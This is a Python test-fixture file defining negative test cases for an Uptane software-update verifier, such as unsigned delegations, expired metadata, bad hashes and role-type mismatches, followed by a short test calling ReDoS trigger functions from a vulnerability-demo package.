def __delegations(delegations_keys_idx: list = None, **kwargs) -> list:
return [
Delegation(
# Note that keys_idx is empty!
role=Role(
keys_idx=delegations_keys_idx,
name=DEFAULT_DELEGATION_NAME,
paths=[DEFAULT_TARGET_NAME],
terminating=False,
threshold=1,
**kwargs
),
**kwargs
),
]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': __delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationUnsignedUptane(Uptane):
'''The delegated metadata has no signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': [],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationBadKeyIdsUptane(Uptane):
'''The top-level targets metadata has bad key IDs for a delegated role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations_bad_key_ids': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationMissingUptane(Uptane):
'''A delegation's metadata is unavailable'''
class ImageStep(Step):
UPDATE_ERROR = 'DelegationMissing::' + MISSING_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
MISSING_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegation_name': MISSING_DELEGATION_NAME,
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationEmptyUptane(Uptane):
'''The target is not present in the delegated role'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
# Should perhaps be a failure in the images repo, since that is where
# the target is missing, but that doesn't work. The error could also be
# more accurate.
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationHashMismatchUptane(Uptane):
'''The delegation has a target with bad hashes'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hash')]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets': __targets,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
# Should be a failure in the images repo, since that is where the
# target is missing, but that doesn't work.
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationExpiredUptane(Uptane):
'''The delegated metadata has expired'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'is_expired': True,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
# Should be a failure in the images repo, since that is where the
# target is missing, but that doesn't work. The error could also be
# more accurate.
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationSnapshotMissingUptane(Uptane):
'''The snapshot metadata does not list a delegation'''
class ImageStep(Step):
UPDATE_ERROR = 'VersionMismatch::' + SKIPPED_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
SKIPPED_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegation_name': SKIPPED_DELEGATION_NAME,
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationSnapshotVersionMismatchUptane(Uptane):
'''The snapshot metadata expects a newer version of a delegation'''
class ImageStep(Step):
UPDATE_ERROR = 'VersionMismatch::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'snapshot_version': 2,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationZeroThresholdUptane(Uptane):
'''A delegation has a threshold of zero.'''
class ImageStep(Step):
UPDATE_ERROR = 'IllegalThreshold::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegation_threshold': 0,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationUnmetThresholdUptane(Uptane):
'''A delegation has an unmet threshold'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6, 7]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': DELEGATION_KEYS_IDX[0:-1],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationTwoSignaturesUptane(Uptane):
'''Simple delegation case with two signatures required'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6, 7]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationNonUniqueSignaturesUptane(Uptane):
'''A delegation has duplicate signatures'''
# Note that at present, the threshold is only set to 1, so one could argue
# this should not be an error, just a warning. (This also affects the other
# non-unique signature tests.)
class ImageStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': DELEGATION_KEYS_IDX + DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
Director role Root: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'SecurityException::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
'_type': 'invalidrole',
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
Director role Targets: _type = "Targets"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'SecurityException::Targets'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'_type': 'invalidrole',
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepRootRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Root: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Root'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'_type': 'invalidrole',
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepTargetsRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Targets: _type = "Targets"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Targets'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'_type': 'invalidrole',
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Snapshot: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Snapshot'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'_type': 'invalidrole',
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Snapshot: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Timestamp'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'_type': 'invalidrole',
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
| 24.588858
| 128
| 0.561782
| 10,294
| 104,601
| 5.253837
| 0.029823
| 0.239835
| 0.207607
| 0.16153
| 0.915315
| 0.910249
| 0.901059
| 0.88697
| 0.87926
| 0.875728
| 0
| 0.008643
| 0.347377
| 104,601
| 4,253
| 129
| 24.594639
| 0.783608
| 0.054177
| 0
| 0.741957
| 0
| 0
| 0.163942
| 0.011842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006096
| false
| 0
| 0.001355
| 0.004741
| 0.117508
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9125b210c8bf5e608391eb8a039fe89233ad7720
| 41
|
py
|
Python
|
ycm/__init__.py
|
chinosk114514/ycm-api
|
249e3dd985bc758b719564f5e20010e606b50921
|
[
"MIT"
] | 8
|
2021-12-09T09:45:52.000Z
|
2022-01-24T09:58:30.000Z
|
ycm/__init__.py
|
chinosk114514/ycm-api
|
249e3dd985bc758b719564f5e20010e606b50921
|
[
"MIT"
] | null | null | null |
ycm/__init__.py
|
chinosk114514/ycm-api
|
249e3dd985bc758b719564f5e20010e606b50921
|
[
"MIT"
] | null | null | null |
from . import query
from . import server
| 13.666667
| 20
| 0.756098
| 6
| 41
| 5.166667
| 0.666667
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 41
| 2
| 21
| 20.5
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
912b59c2f97a7271614a8a3530723bfd0c642345
| 167
|
py
|
Python
|
tests/trigger/test_redos.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | 7
|
2021-03-23T17:40:45.000Z
|
2022-03-14T16:07:27.000Z
|
tests/trigger/test_redos.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | 27
|
2020-06-29T13:35:45.000Z
|
2022-01-21T07:10:55.000Z
|
tests/trigger/test_redos.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | 14
|
2020-07-26T18:23:16.000Z
|
2022-03-09T13:44:53.000Z
|
from vulnpy.trigger import redos
def test_re_fullmatch():
redos.do_re_fullmatch("a")
def test_re_fullmatch_compiled():
redos.do_re_fullmatch_compiled("a")
| 16.7
| 39
| 0.766467
| 25
| 167
| 4.72
| 0.48
| 0.372881
| 0.152542
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131737
| 167
| 9
| 40
| 18.555556
| 0.813793
| 0
| 0
| 0
| 0
| 0
| 0.011976
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
